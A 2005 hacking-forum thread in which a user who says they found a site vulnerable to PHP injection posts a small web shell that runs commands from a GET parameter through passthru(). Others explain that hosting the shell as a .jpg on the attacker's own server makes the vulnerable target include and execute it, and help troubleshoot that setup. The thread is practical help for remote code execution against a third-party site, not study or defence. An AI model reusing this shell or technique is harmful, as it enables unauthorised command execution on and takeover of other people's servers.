Follow us on Twitter!
It is never to LATE to become what you never WERE.
Monday, April 21, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 26
Guests Online: 26
Members Online: 0

Registered Members: 82852
Newest Member: sockpuppets
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-05-05 18:32
I found a site which is vulnerable for Php injections atack. If I use script like:
Code
 <?php
$cmd = $_GET['command'];
echo $cmd;
if ($cmd){
passthru($cmd);
}
?>



and enter into ls command I get list from my server not atack server. Any solution. Also I am interested in uploading files, how can I change permission for upload and how can I get path? (for permission I could chmod from uper script but - same problem. To get path I could excecute include error (same problem - it shows error on my server) or use getcwd().
Is there any possible solution, except overwritting one of server files with upper script?
Tnx
Author

RE: Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-05-05 21:26
It was my mistake, file was in php format (it had to be in jpg)
Author

RE: Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-05-05 22:19
Yup. In this case, the libjpeg parser and apache handlers have no effect on it, as the file is being included as raw text. By including a PHP type with normal mime types, your telling the server to do a GET on it, and when the mime types are set correctly, it executes the script and then draws its output to your file, and thus echos it.

You can give it any filetype you want, as long as it isn't parsed by either server as types like ASP, PHP, HTML, or anything with a mimetype that would give it an effect on the originating server.

I should put up my PHP injections article from Rohitab and HTS on here soon. I'll do that later.


Author

RE: Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-06-05 07:24
I read an article on that. It doesn't work for me...it says it contains errors..any suggestions/


Author

RE: Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-06-05 07:49
What error do you have??
Author

RE: Php injections


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-06-05 07:54
The image “http://www.mysitecom/cmd.jpg?cmd=ls?" cannot be displayed, because it contains errors.